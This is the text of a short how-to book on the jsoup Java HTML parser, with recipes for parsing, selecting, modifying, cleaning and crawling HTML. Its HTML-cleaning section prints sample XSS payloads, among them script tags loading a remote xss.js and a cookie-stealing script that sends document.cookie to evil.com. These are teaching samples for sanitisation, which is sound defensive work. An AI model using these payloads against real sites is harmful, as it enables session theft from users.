Instant jsoup How-to: Effectively extract and manipulate HTML content with the jsoup library

By Pete Houston
Book Jun 2013 38 pages 1st Edition
Product Details


Publication date : Jun 7, 2013
Length 38 pages
Edition : 1st Edition
Language : English
ISBN-13 : 9781782167990

Chapter 1. Instant Jsoup How-to

Welcome to Instant Jsoup How-to. As you look around, you will see that many websites and services provide information through RSS, Atom, or even through a web service API; however, lots of sites don't provide such facilities. That is the reason why many HTML parsers arise to support the ability of web scraping. Jsoup, one among the popular HTML parsers for Java developers, stands as a powerful framework that gives developers an easy way to extract and transform HTML content. This book is therefore written with all the recipes that are needed to grab web information.

Giving input for parser (Must know)


HTML data for parsing can come from different types of sources, such as a local file, a string, or a URI. Let's have a look at how we can handle these types of input for parsing using Jsoup.

How to do it...

  1. Create the Document class structure from Jsoup, depending on the type of input.

    • If the input is a string, use:

      String html = "<html><head><title>jsoup: input with string</title></head><body>Such an easy task.</body></html>";
      Document doc = Jsoup.parse(html);
    • If the input is from a file, use:

      try {
          File file = new File("index.html");
          Document doc = Jsoup.parse(file, "utf-8");
      } catch (IOException ioEx) {
          ioEx.printStackTrace();
      }
    • If the input is from a URL, use:

      Document doc = Jsoup.connect("http://www.example.com").get();
  2. Include the correct package at the top.

    import java.io.File;
    import java.io.IOException;
    import org.jsoup.Jsoup;
    import org.jsoup.nodes.Document;

Note

The complete example source code for this section is in \source\Section01.

The API reference for this section is available at the following location:

http://jsoup.org/apidocs/org/jsoup/Jsoup.html

How it works...

Basically, all the inputs will be given to the Jsoup class to parse.

For an HTML string, you just need to pass the HTML string as parameter for the method Jsoup.parse().

For an HTML file, two parameters are passed to Jsoup.parse(). The first one is the File object, which points to the specified HTML file; the second one is the character set of the file. There is an overload of this method with an additional third parameter, Jsoup.parse(File file, String charsetName, String baseUri). The baseUri is the URL from which the HTML file was retrieved; it is used to resolve relative paths or links.

For a URL, you need to use the Jsoup.connect() method. It returns an object that implements the Connection interface. Through this object, you can fetch and parse the content of the page using the Connection.get() method.

The previous example is pretty easy and straightforward. The results of parsing from the Jsoup class will return a Document object, which represents a DOM structure of an HTML page, where the root node starts from <html>.
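As a minimal sketch of the string case, the following parses an HTML string and inspects the resulting Document. The class name InputSketch and the helper describe() are illustrative only and are not part of Jsoup.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

class InputSketch {
    // Hypothetical helper: parse an HTML string and summarize the resulting DOM.
    static String describe(String html) {
        Document doc = Jsoup.parse(html);
        // child(0) is the first element under the document root, that is, <html>.
        String root = doc.child(0).tagName();
        return root + " | " + doc.title() + " | " + doc.body().text();
    }

    public static void main(String[] args) {
        String html = "<html><head><title>jsoup: input with string</title></head>"
                + "<body>Such an easy task.</body></html>";
        System.out.println(describe(html));
    }
}
```

The same Document API applies whether the input came from a string, a file, or a URL.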

There's more...

Besides complete HTML documents, the Jsoup library also accepts a body fragment as input. This can be seen at the following location:

http://jsoup.org/apidocs/org/jsoup/Jsoup.html#parseBodyFragment(java.lang.String)
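A short sketch of parsing a body fragment follows. The fragment text and the class name FragmentSketch are made up for illustration; the only Jsoup call assumed is Jsoup.parseBodyFragment(String).

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

class FragmentSketch {
    // Wraps the fragment in a full document skeleton (<html>, <head>, <body>).
    static Document parseFragment(String fragment) {
        return Jsoup.parseBodyFragment(fragment);
    }

    public static void main(String[] args) {
        Document doc = parseFragment("<p>Hello <b>world</b></p>");
        // The fragment ends up as the content of <body>.
        System.out.println(doc.body().children().size());
        System.out.println(doc.body().text());
    }
}
```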

Tip

Downloading the example code

You can download the example code files for all Packt books you have purchased from your account at http://www.packtpub.com. If you purchased this book elsewhere, you can visit http://www.packtpub.com/support and register to have the files e-mailed directly to you.

Extracting data using DOM (Must know)


As the input is ready for extraction, we will begin with HTML parsing using the DOM method.

Note

If you don't know what DOM is, you can have a quick start with the DOM tutorial at:

http://www.w3schools.com/htmldom/

Let's move on to the details of how it works in Jsoup.

Getting ready

This section will parse the content of the page at http://jsoup.org.

The index.html file in the project is provided if you want to have a file as input, instead of connecting to the URL.

How to do it...

The following screenshot shows the page that is going to be parsed:

By viewing the source code for this HTML page, we know the site structure.

The Jsoup library is quite supportive of the DOM navigation method; it provides ways to find elements and extract their contents efficiently.

  1. Create the Document class structure by connecting to the URL.

    Document doc = Jsoup.connect("http://jsoup.org").get();
  2. Navigate to the menu tag whose class is nav-sections.

    Elements navDivTag = doc.getElementsByClass("nav-sections");
  3. Get the list of all <a> tags inside the menu.

    Elements list = navDivTag.get(0).getElementsByTag("a");
  4. Extract content from each Element class in the previous menu list.

    for(Element menu: list) {
        System.out.print(String.format("[%s]", menu.html()));
    }

The output should look like the following screenshot after running the code:

The complete example source code for this section is placed at \source\Section02.

Note

The API reference for this section is available at:

http://jsoup.org/apidocs/org/jsoup/nodes/Element.html

How it works...

Let's have a look at the navigation structure:

html > body.n1-home > div.wrap > div.header > div.nav-sections > ul > li.n1-news > a

The div class="nav-sections" tag is the parent of the navigation section, so calling getElementsByClass("nav-sections") returns this tag. Since only one tag has this class value in this example, we only need the first element found, which is at index 0 of the results.

Elements navDivTag = doc.getElementsByClass("nav-sections");

The Elements object in Jsoup represents a collection (Collection<>) or a list (List<>); therefore, you can easily iterate through this object to get each element, which is known as an Element object.

When at a parent tag, there are several ways to get to the children. Navigate from subtag <ul>, and deeper to each <li> tag, and then to the <a> tag. Or, you can directly make a query to find all the <a> tags. That's how we retrieved the list that we found, as shown in the following code:

Elements list = navDivTag.get(0).getElementsByTag("a");

The final part is to print the extracted HTML content of each <a> tag.

Beware of the list value: even if the navigation fails to find any element, the list is never null. It is therefore good practice to check the size of the list before doing any other task.

Additionally, the Element.html() method is used to return the HTML content of a tag.
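The size check described above can be sketched as follows. The HTML passed in is hypothetical markup that mimics the navigation structure, and MenuSketch and menuLabels() are illustrative names, not part of Jsoup.

```java
import java.util.ArrayList;
import java.util.List;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

class MenuSketch {
    // Returns the link labels inside the first element with class "nav-sections",
    // or an empty list when no such element exists.
    static List<String> menuLabels(String html) {
        Document doc = Jsoup.parse(html);
        Elements navDivTag = doc.getElementsByClass("nav-sections");
        List<String> labels = new ArrayList<>();
        if (navDivTag.isEmpty()) { // never null, but it may be empty
            return labels;
        }
        for (Element menu : navDivTag.get(0).getElementsByTag("a")) {
            labels.add(menu.text());
        }
        return labels;
    }

    public static void main(String[] args) {
        String html = "<div class=\"nav-sections\"><ul>"
                + "<li><a href=\"/news\">News</a></li>"
                + "<li><a href=\"/bugs\">Bugs</a></li>"
                + "</ul></div>";
        System.out.println(menuLabels(html));
        System.out.println(menuLabels("<p>no menu here</p>"));
    }
}
```

Without the emptiness check, get(0) on an empty result would throw an IndexOutOfBoundsException.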

There's more...

Jsoup is quite a powerful library for DOM navigation. Besides the methods mentioned previously, the Element class supports other ways to find and extract elements. The following are the common methods for DOM navigation:

| Methods | Descriptions |
| --- | --- |
| getElementById(String id) | Finds an element by ID, including or under the element that calls this method. |
| getElementsByTag(String c) | Finds elements, including and recursively under the element that calls this method, with the specified tag name (in this case, c). |
| getElementsByClass(String className) | Finds elements that have this class, including or under the element that calls this method. Case insensitive. |
| getElementsByAttribute(String key) | Finds elements that have a named attribute set. Case insensitive. This method has several relatives, such as getElementsByAttributeStarting(String keyPrefix), getElementsByAttributeValue(String key, String value), and getElementsByAttributeValueNot(String key, String value). |
| getElementsMatchingText(Pattern pattern) | Finds elements whose text matches the supplied regular expression. |
| getAllElements() | Finds all elements under the specified element (including self and children of children). |
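A few of these navigation methods can be tried on a small in-memory document. This is only a sketch: the markup, the data-role attribute, and the class name NavigationSketch are invented for the example.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

class NavigationSketch {
    // Hypothetical markup: a menu with two links, one carrying a data attribute.
    static final String HTML = "<div id=\"menu\">"
            + "<a href=\"/news\" class=\"item\">News</a>"
            + "<a href=\"/bugs\" class=\"item\" data-role=\"tracker\">Bugs</a>"
            + "</div>";

    static Document sample() {
        return Jsoup.parse(HTML);
    }

    public static void main(String[] args) {
        Document doc = sample();
        // Look up a single element by its ID.
        System.out.println(doc.getElementById("menu").tagName());
        // Count elements by class, attribute name, and attribute name prefix.
        System.out.println(doc.getElementsByClass("item").size());
        System.out.println(doc.getElementsByAttribute("data-role").size());
        System.out.println(doc.getElementsByAttributeStarting("data-").size());
        // Find the element whose href has an exact value.
        System.out.println(doc.getElementsByAttributeValue("href", "/news").first().text());
    }
}
```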

The methods used to extract content from an HTML element also deserve a mention. The following table shows the common ones:

| Methods | Descriptions |
| --- | --- |
| id() | This retrieves the ID value of an element. |
| className() | This retrieves the class name value of an element. |
| attr(String key) | This gets the value of a specific attribute. |
| attributes() | This is used to retrieve all the attributes. |
| html() | This is used to retrieve the inner HTML value of an element. |
| data() | This is used to retrieve the data content, usually applied for getting content from the <script> and <style> tags. |
| text() | This is used to retrieve the text content. This method returns the combined text of all inner children and removes all HTML tags, while the html() method returns everything between its open and closed tags. |
| tag() | This retrieves the tag of the element. |

The following code prints the corresponding relative path of each <a> tag found in the menu list to demonstrate the use of the attr() method to get attribute content.

System.out.println("\nMenu and its relative path:");
for(Element menu: list) {
  System.out.println(String.format("[%s] href = %s", menu.html(), menu.attr("href")));
}
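To see several of the extraction methods side by side, here is a small sketch on an in-memory document. The markup and the names ExtractSketch, describe(), and scriptData() are assumptions made for the example.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Element;

class ExtractSketch {
    // Summarizes the first element with the given tag name using id(),
    // className(), tag(), and text().
    static String describe(String html, String tagName) {
        Element el = Jsoup.parse(html).getElementsByTag(tagName).first();
        return "id=" + el.id()
                + " class=" + el.className()
                + " tag=" + el.tag().getName()
                + " text=" + el.text();
    }

    // data() returns the raw content of a <script> or <style> element.
    static String scriptData(String html) {
        return Jsoup.parse(html).getElementsByTag("script").first().data();
    }

    public static void main(String[] args) {
        String html = "<p id=\"intro\" class=\"lead\">Hello <b>world</b></p>"
                + "<script>var x = 1;</script>";
        System.out.println(describe(html, "p"));
        System.out.println(scriptData(html));
    }
}
```

Note that text() flattens the nested <b> tag into plain text, whereas html() on the same element would keep it.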

Extracting data using CSS selector (Must know)


Instead of DOM navigation, this recipe uses CSS selectors. A CSS selector identifies elements with the same pattern syntax that CSS uses to target the elements it styles. Let's see how this works.

Getting ready

If you don't know the CSS selector syntax yet, I suggest finding some tutorials or guidelines to learn about it first.

Note

The following two links will be helpful for you to learn about CSS selector syntax:

How to do it...

Now we will try to use CSS selector syntax to do the same task that DOM navigation does. Basically, it is the same code as in the previous recipe but is a little different in the way we parse the content.

  1. Create the Document class structure by loading the URL:

    Document doc = Jsoup.connect(mUrl).get();
  2. Select the <div> tag with the class attribute nav-sections:

    Elements navDivTag = doc.select("div.nav-sections");
  3. Select all the <a> tags:

    Elements list = navDivTag.select("a");
  4. Retrieve the results from the list:

    for(Element menu: list) {
        System.out.print(String.format("[%s]", menu.html()));
    }

As you try to execute this code, it will produce the same result as the previous recipe by using DOM navigation.

The complete example source code for this section is available at \source\Section03.

How it works...

It works like a charm! Well, there is actually no magic here. It's just that the selector query will give the direction to the target elements and Jsoup will find it for you. The select() method is written for this task so that you don't have to care a lot about it.

Through the query doc.select("div.nav-sections"), the Document class will try to find and return all the <div> tags that have class name equal to nav-sections.

It is even simpler when trying to find the children; Jsoup will look up every child and their children to find the tags that match the selector. That's how all the <a> tags are selected in step 3. Compared to DOM navigation, it is much simpler to use and easier to understand. Developers should know HTML page structure in order to use the CSS selector query.
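The two select() calls from the steps can also be folded into a single query with a descendant combinator. The following is a sketch on hypothetical markup; SelectorSketch and menuLabels() are illustrative names.

```java
import java.util.ArrayList;
import java.util.List;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;

class SelectorSketch {
    static List<String> menuLabels(String html) {
        Document doc = Jsoup.parse(html);
        List<String> labels = new ArrayList<>();
        // One query: every <a> that is a descendant of div.nav-sections.
        for (Element menu : doc.select("div.nav-sections a")) {
            labels.add(menu.text());
        }
        return labels;
    }

    public static void main(String[] args) {
        String html = "<a href=\"/\">Home</a>"
                + "<div class=\"nav-sections\"><ul>"
                + "<li><a href=\"/news\">News</a></li>"
                + "<li><a href=\"/bugs\">Bugs</a></li>"
                + "</ul></div>";
        // The Home link sits outside the menu, so it is not selected.
        System.out.println(menuLabels(html));
    }
}
```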

There's more...

Please refer to the following pages for the usage of all CSS selector syntax to use in your application:

Transforming HTML elements (Must know)


Basically, an HTML parser does two things—extraction and transformation. While the extraction is described in previous recipes, this recipe is going to talk about transformation or modification.

How to do it...

In this section, I'm going to show you how to use Jsoup library to modify the following HTML page:

<html>
  <head>
    <title>Section 04: Modify elements' contents</title>
  </head>
  <body>
    <h1>Jsoup: the HTML parser</h1>
  </body>
</html>

After some minor changes, the result should look like this:

<html>
  <head>
    <title>Section 04: Modify elements' contents</title>
    <meta charset="utf-8" />
  </head>
  <body class=" content">
    <h1>Jsoup: the HTML parser</h1>
    <p align="center">Author: Johnathan Hedley</p>
    <p>It is a very powerful HTML parser! I love it so much...</p>
  </body>
</html>

Perform the following tasks:

  • Add a <meta> tag to <head>

  • Add a <p> tag for body content description

  • Add a <p> tag for body content author

  • Add an attribute to the <p> tag of the author

  • Add the class for the <body> tag

The previous tasks will be implemented in the following way:

  1. Add a <meta> tag to <head>.

    Element tagMetaCharset = new Element(Tag.valueOf("meta"), "");
    tagMetaCharset.attr("charset", "utf-8");
    doc.head().appendChild(tagMetaCharset);
  2. Add a <p> tag for body content description.

    Element tagPDescription = new Element(Tag.valueOf("p"), "");
    tagPDescription.text("It is a very powerful HTML parser! I love it so much...");
    doc.body().appendChild(tagPDescription);
  3. Add a <p> tag for body content author.

    tagPDescription.before("<p>Author: Johnathan Hedley</p>");
  4. Add an attribute to the <p> tag of the author.

    Element tagPAuthor = doc.body().select("p:contains(Author)").first();
    tagPAuthor.attr("align", "center");
  5. Add a class for the <body> tag.

    doc.body().addClass("content");

The complete example source code for this section is available at \source\Section04.

How it works...

As you see, the <meta> tag doesn't exist, so we need to create a new Element that represents the <meta> tag.

Element tagMetaCharset = new Element(Tag.valueOf("meta"), "");
tagMetaCharset.attr("charset", "utf-8");

The constructor of the Element object requires two parameters: one is the Tag object, and the other is the base URI of the element. Usually, the base URI is an empty string when creating the Element object; you can supply a base URI when you want to specify where this element belongs. One thing worth remembering is that the Tag class doesn't have a public constructor, so developers need to create a Tag object through the static method Tag.valueOf(String tagName).

In the next line, the attr(String key, String value) method is used to set the attribute value, where key is the name of the attribute.

doc.head().appendChild(tagMetaCharset);

Instead of looking up the <head> or <body> tag, Jsoup already provides two methods to get these two elements directly, which makes it very convenient to append a new child to the <head> tag. If you want to insert the <meta> tag before <title>, you can use the prependChild() method instead. The call to appendChild() adds a new element at the end of the list of children, while prependChild() adds a new element as the first child.

Element tagPDescription = new Element(Tag.valueOf("p"), "");
tagPDescription.text("It is a very powerful HTML parser! I love it so much...");
doc.body().appendChild(tagPDescription);

The second task is performed by the same code, basically.

Sometimes, you may find it too complicated to create objects and add them to their parents; Jsoup also supports adding elements directly from an HTML string.

tagPDescription.before("<p>Author: Johnathan Hedley</p>");

The third task is done by directly adding an HTML string as a sibling of the previous <p> tag. The before(String html) method is similar to prependChild(Node node), but it inserts a preceding sibling instead of a first child.

The next task is to add the align=center attribute to the author <p> tag that we've just added. Up to this point, you may have learned various ways to navigate to this tag; well, I choose one easy way to achieve the task, that is, making a CSS selector get to the first <p> tag that contains the text Author in its HTML content.

Element tagPAuthor = doc.body().select("p:contains(Author)").first();
tagPAuthor.attr("align", "center");

The first line uses the :contains pseudo selector to find the tag, and the second line adds the attribute to it.

The final task can easily be achieved by using the addClass(String classname) method:

doc.body().addClass("content");

If you try to add an already existing class name, it won't add because Jsoup is smart enough to ensure that a class name only appears once in an element.
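Putting the five tasks together, a self-contained sketch might look like the following. It parses the page from a string instead of a file, and TransformSketch and transform() are illustrative names. The second addClass() call is only there to show that the class is not duplicated.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.parser.Tag;

class TransformSketch {
    static Document transform(String html) {
        Document doc = Jsoup.parse(html);

        // Task 1: add <meta charset="utf-8"> to <head>.
        Element meta = new Element(Tag.valueOf("meta"), "");
        meta.attr("charset", "utf-8");
        doc.head().appendChild(meta);

        // Task 2: append the description paragraph to <body>.
        Element description = new Element(Tag.valueOf("p"), "");
        description.text("It is a very powerful HTML parser! I love it so much...");
        doc.body().appendChild(description);

        // Task 3: insert the author paragraph as a preceding sibling.
        description.before("<p>Author: Johnathan Hedley</p>");

        // Task 4: find the author paragraph and set its align attribute.
        Element author = doc.body().select("p:contains(Author)").first();
        author.attr("align", "center");

        // Task 5: add the class; the repeated call has no further effect.
        doc.body().addClass("content");
        doc.body().addClass("content");
        return doc;
    }

    public static void main(String[] args) {
        String html = "<html><head><title>Section 04</title></head>"
                + "<body><h1>Jsoup: the HTML parser</h1></body></html>";
        System.out.println(transform(html).html());
    }
}
```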

There's more...

What you previously saw is just a demonstration of the Jsoup library's capabilities in manipulating HTML elements contents through some common methods.

You will find more useful and convenient methods while working with Jsoup through its API reference page.

Miscellaneous Jsoup options (Should know)


Usually, developers only work on Jsoup with default options, unaware that it provides various useful options. This recipe will acquaint you with some common-use options.

How to do it...

  1. How to work with connection objects:

    • Setting userAgent: It is very important to always specify userAgent when sending HTTP requests. What if the web page displays some information differently on different browsers? The result of parsing might be different.

      Document doc = Jsoup.connect(url).userAgent("Mozilla/5.0 (Windows NT 6.1)").get();

    Especially when using Jsoup in Android, you must always specify a user agent; otherwise, it won't work properly.

    • When forced to work with different content types:

      Document doc = Jsoup.connect(url).ignoreContentType(true).get();

    By default, Jsoup only allows working with HTML and XML content type and throws exceptions for others. So, you will need to specify this properly in order to work with other content types, such as RSS, Atom, and so on.

    • Configure a connection timeout:

      Document doc = Jsoup.connect(url).timeout(5000).get();

    The default timeout in the version of Jsoup covered here is 3000 milliseconds (three seconds). Zero indicates an infinite timeout.

    • Add a parameter request to the connection:

      Document doc = Jsoup.connect(url).data("author", "Pete Houston").get();

    Dynamic web pages often expect request parameters; the data() method serves this purpose.

    Note

    Please refer to the following link for more information:

    http://jsoup.org/apidocs/org/jsoup/Connection.html#data(java.lang.String, java.lang.String)

    • Sometimes, the request must be sent as POST:

      Document doc = Jsoup.connect(url).data("author", "Pete Houston").post();
  2. Setting the HTML output of the Document class.

    This option works through the Document.OutputSettings class.

    Note

    Please refer to the following link for more information:

    http://jsoup.org/apidocs/org/jsoup/nodes/Document.OutputSettings.html

    This class outputs HTML text in a neat format with the following options:

    • Character set: Get/set document charset

    • Escape mode: Get/set escape mode of HTML output

    • Indentation: Get/set indent amount for pretty printing (by space count)

    • Outline: Enable/disable HTML outline mode

    • Pretty print: Enable/disable pretty printing mode

    For example, to display the HTML output with the charset set to utf-8 and an indentation of four spaces, with both HTML outline mode and pretty printing enabled:

    Document.OutputSettings settings = new Document.OutputSettings();
    settings.charset("utf-8").indentAmount(4).outline(true).prettyPrint(true);
    Document doc = …// create DOM object somewhere
    doc.outputSettings(settings);
    System.out.println(doc.html());

    After the output settings are applied to the Document, its content is rendered in the corresponding format; call the Document.html() method to get the output.

  3. Configure the parser type.

    Jsoup provides two parser types: HTML parser and XML parser.

    By default, it uses HTML parser. However, if you are going to parse XML such as RSS or Atom, you should change the parser type to XML parser or it will not work properly.

    Document doc = Jsoup.connect(url).parser(Parser.xmlParser()).get();
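Several of the options above can be exercised without touching the network. The sketch below chains connection options without sending the request, and parses an XML string with the XML parser. OptionsSketch, configure(), and firstItemTitle() are illustrative names, and the RSS-like snippet is made up.

```java
import org.jsoup.Connection;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.parser.Parser;

class OptionsSketch {
    // Builds (but does not send) a request with several options chained.
    static Connection configure(String url) {
        return Jsoup.connect(url)
                .userAgent("Mozilla/5.0 (Windows NT 6.1)")
                .timeout(5000)
                .data("author", "Pete Houston")
                .parser(Parser.xmlParser());
    }

    // Parses an XML string with the XML parser and returns the text of the
    // first <title> that is a direct child of an <item>.
    static String firstItemTitle(String xml) {
        Document doc = Jsoup.parse(xml, "", Parser.xmlParser());
        return doc.select("item > title").first().text();
    }

    public static void main(String[] args) {
        Connection con = configure("http://example.com");
        System.out.println(con.request().timeout());
        System.out.println(con.request().header("User-Agent"));

        String xml = "<rss><channel><item><title>First</title>"
                + "<link>http://example.com/1</link></item></channel></rss>";
        System.out.println(firstItemTitle(xml));
    }
}
```

Calling get() or post() on the configured Connection is what actually sends the request.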

There's more...

The previously mentioned options in Jsoup are important ones that the developers should know and make use of.

However, there are several more that you can try:

Cleaning dirty HTML documents (Become an expert)


HTML documents are not always well formed. This might expose some vulnerabilities for hackers to attack, such as Cross-site scripting (XSS). Luckily, Jsoup has already provided some methods for cleaning these invalid HTML documents. Additionally, Jsoup is capable of parsing the incorrect HTML and transforming it into the correct one. Let's have a look at how we can make a well-formed HTML document.

Getting ready

If you've never heard about XSS before, I suggest you learn more about it to follow this section.

How to do it...

Our task in this section is to clean the buggy, XSSed HTML:

<html>
  <head>
  <title>Section 05: Clean dirty HTML</title>
  <meta http-equiv="refresh" content="0;url=javascript:alert('xss01');">
  <meta charset="utf-8" />
  </head>

  <body onload=alert('XSS02')>
    <h1>Jsoup: the HTML parser</h1>
    <script src=http://ha.ckers.org/xss.js></script>
    <img """><script>alert("XSS03")</script>">
    <img src=# onmouseover="alert('xxs04')">
    <script/XSS src="http://ha.ckers.org/xss.js"></script>
    <script/src="http://ha.ckers.org/xss.js"></script>
    <iframe src="javascript:alert('XSS05');"></iframe>
    <img src="http://www.w3.org/html/logo/img/mark-only-icon.png" />
    <img src="www.w3.org/html/logo/img/mark-only-icon.png" />
  </body>
</html>

If you open this file in the Chrome or Firefox browser, you will see the XSS. Just imagine that if users open this XSSed HTML and are redirected to a page that hackers have total control over, the hackers could, for example, steal users' cookies, which is very dangerous.

<img """>
<script>
document.location = 'http://evil.com/steal.php?cookie=' + document.cookie;
</script>">

There are thousands of ways for XSS attacks to occur, so you should clean any untrusted HTML; it's time for Jsoup to do its job.

  1. Load the Document class structure.

    File file = new File("index.html");
    Document doc = Jsoup.parse(file, "utf-8");
  2. Create a whitelist.

    Whitelist allowList = Whitelist.relaxed();
  3. Add more allowed tags and attributes.

    allowList
      .addTags("meta", "title", "script", "iframe")
      .addAttributes("meta", "charset")
      .addAttributes("iframe", "src")
      .addProtocols("iframe", "src", "http", "https");
  4. Create Cleaner, which will do the cleaning task.

    Cleaner cleaner = new Cleaner(allowList);
  5. Clean the dirty HTML.

    Document newDoc = cleaner.clean(doc);
  6. Print the new clean HTML.

    System.out.println(newDoc.html());

This is the result of the cleaning:

<html>
  <head>
  </head>
  <body>
    <h1>Jsoup: the HTML parser</h1>
  <script>
  </script>
  <img />
  <script>
  </script>&quot;&gt;
  <img />
  <script>
  </script>
  <script>
  </script>
  <iframe>
  </iframe>
  <img src="http://www.w3.org/html/logo/img/mark-only-icon.png" />
  <img />
  </body>
</html>

Indeed, the resulting HTML is very clean and there is almost no script at all.

The complete example source code for this section is available at \source\Section05.

How it works...

The concept of cleaning dirty HTML in Jsoup is to identify the known safe tags and allow them in the result parse tree. These allowed tags are defined in Whitelist.

  Whitelist allowList = Whitelist.relaxed();
  allowList
  .addTags("meta", "title", "script", "iframe")
  .addAttributes("meta", "charset")
  .addAttributes("iframe", "src")
  .addProtocols("iframe", "src", "http", "https");

Here we define Whitelist, which is created through the relaxed() method and contains the following tags:

a, b, blockquote, br, caption, cite, code, col, colgroup, dd, dl, dt, em, h1, h2, h3, h4, h5, h6, i, img, li, ol, p, pre, q, small, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, u, and ul

If you want to add more tags, use the method addTags(String… tags). As you can see, the list of tags created through relaxed() doesn't have <meta>, <title>, <script>, and <iframe>, so I added them to the list manually by using addTags().

If the allowed tags have the attributes, you should add the list of allowed attributes to each tag.

One special attribute is src, which contains a URL to a file, and it's always good practice to restrict its protocols to prevent inline scripting XSS. Consider this line from the buggy HTML shown earlier:

<iframe src="javascript:alert('XSS05');">
</iframe>

The attribute "src" is supposed to refer to a URL but it actually does not. The fix is to ensure the "src" value is acquired through HTTP or HTTPS. That is what the following line means:

  .addProtocols("iframe", "src", "http", "https");

You can write in chain while adding tags or attributes.

While Whitelist provides the safe tag list, Cleaner, on the other hand, takes Whitelist as input to clean the input HTML:

  Cleaner cleaner = new Cleaner(allowList);
  Document newDoc = cleaner.clean(doc);

The new Document class is created after cleaning is done.
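The effect of a whitelist can be checked on a small snippet. One loud assumption here: this sketch targets Jsoup 1.14.1 or later, where the Whitelist class was renamed Safelist; on the 1.7.2 release covered in this book, substitute Whitelist for Safelist. The dirty markup, CleanSketch, and clean() are invented for the example.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.safety.Cleaner;
import org.jsoup.safety.Safelist; // assumption: named Whitelist in Jsoup 1.7.2

class CleanSketch {
    // Parses the dirty HTML and keeps only what the basic() list allows.
    static Document clean(String dirtyHtml) {
        Document dirty = Jsoup.parse(dirtyHtml);
        Cleaner cleaner = new Cleaner(Safelist.basic());
        return cleaner.clean(dirty);
    }

    public static void main(String[] args) {
        String dirty = "<p onclick=\"evil()\">Hi <script>alert(1)</script>"
                + "<a href=\"javascript:alert(2)\">bad</a> "
                + "<a href=\"http://example.com/\">good</a></p>";
        Document safe = clean(dirty);
        // The <script> tag, the onclick attribute, and the javascript: href are
        // dropped; the http link keeps its href.
        System.out.println(safe.body().html());
    }
}
```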

There's more...

Cleaner only keeps the allowed HTML tags provided by Whitelist input; everything else is removed.

For convenience, Jsoup supports the following five predefined white-lists:

  • none(): This allows only text nodes, all HTML will be stripped

  • simpleText(): This allows only simple text formatting, such as b, em, i, strong, and u

  • basic(): This allows a fuller range of text nodes, such as a, b, blockquote, br, cite, code, dd, dl, dt, em, i, li, ol, p, pre, q, small, strike, strong, sub, sup, u, and ul, and appropriate attributes

  • basicWithImages(): This allows the same text tags as basic() and also allows the img tags, with appropriate attributes, with src pointing to http or https

  • relaxed(): This allows a full range of text and structural body HTML tags, such as a, b, blockquote, br, caption, cite, code, col, colgroup, dd, dl, dt, em, h1, h2, h3, h4, h5, h6, i, img, li, ol, p, pre, q, small, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, u, and ul

Tags removed in <head>

If you pay more attention, you can see that everything inside the <head> tag is removed, even when you allow them in the whitelist as shown in the previous code.

Note

The current version of Jsoup is 1.7.2; please look up GitHub, lines 45 and 46, at the following location:

https://github.com/jhy/jsoup/blob/master/src/main/java/org/jsoup/safety/Cleaner.java#L45

The cleaner keeps and parses only <body>, not <head> as shown in the following code snippet:

  if (dirtyDocument.body() != null)
      copySafeNodes(dirtyDocument.body(), clean.body());

So, if you want to clean the <head> tag instead of removing everything, get the code, modify it, and build your own package. Add the following two lines:

if (dirtyDocument.head() != null)
    copySafeNodes(dirtyDocument.head(), clean.head());

Listing all URLs within an HTML page (Should know)


We are one step closer to data crawling techniques, and this recipe is going to give you an idea on how to parse all the URLs within an HTML document.

How to do it...

In this task, we are going to parse all links in http://jsoup.org.

  1. Load the Document class structure from the page.

    Document doc = Jsoup.connect(URL_SOURCE).get();
  2. Select all the URLs in the page.

    Elements links = doc.select("a[href]");
  3. Output the results.

    for(Element url: links) {
        System.out.println(String.format("* [%s] : %s ", url.text(), url.attr("abs:href")));
    }

The complete example source code for this section is available at \source\Section06.

How it works...

Up to this point, I think you're already familiar with CSS selector and know how to extract contents from a tag/node.

The sample code will select all <a> tags with an href attribute and print the output:

System.out.println(String.format("* [%s] : %s ", url.text(), url.attr("abs:href")));

If you simply print the attribute value like url.attr("href"), the output will print exactly like the HTML source, which means some links are relative and not all are absolute. The meaning of abs:href here is to give a resolution for the absolute URL.
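The difference between href and abs:href is easiest to see on a document parsed with an explicit base URI. This is a sketch on made-up markup; LinkSketch and links() are illustrative names, and the base URI is passed to Jsoup.parse(String html, String baseUri) because there is no real connection to supply it.

```java
import java.util.ArrayList;
import java.util.List;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;

class LinkSketch {
    // Pairs each raw href value with its absolute form.
    static List<String> links(String html, String baseUri) {
        Document doc = Jsoup.parse(html, baseUri);
        List<String> out = new ArrayList<>();
        for (Element url : doc.select("a[href]")) {
            out.add(url.attr("href") + " -> " + url.attr("abs:href"));
        }
        return out;
    }

    public static void main(String[] args) {
        String html = "<a href=\"/download\">Download</a>"
                + "<a href=\"http://example.com/x\">X</a>"
                + "<a name=\"anchor\">no href</a>";
        // The third <a> has no href attribute, so a[href] skips it.
        for (String line : links(html, "http://jsoup.org/")) {
            System.out.println(line);
        }
    }
}
```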

There's more...

In HTML, the <a> tag is not the only one that contains a URL, there are other tags also, such as <img>, <script>, <iframe>, and so on. So how are we going to get their links?

If you pay attention to these tags, you can see that they have the same common attribute, src. So the task is quite simple: retrieve all tags containing the src attribute inside:

  Elements results = doc.select("[src]");

Note

The following is a very good link listing from the Jsoup author:

http://jsoup.org/cookbook/extracting-data/example-list-links

Listing all images within an HTML page (Should know)


Another well-known example of data parsing tasks nowadays is image crawling. Let's try to do it with Jsoup parser.

How to do it...

In this task, we're going to parse a few images from http://www.packtpub.com/.

  1. Load the Document class structure from the page.

    Document doc = Jsoup.connect(URL_SOURCE).get();
  2. Select the images.

    Elements links = doc.select("img[src]");
  3. Output the results.

    for(Element url: links) {
        System.out.println("* " + url.attr("abs:src"));
    }

The complete example source code for this section is available at \source\Section07.

How it works...

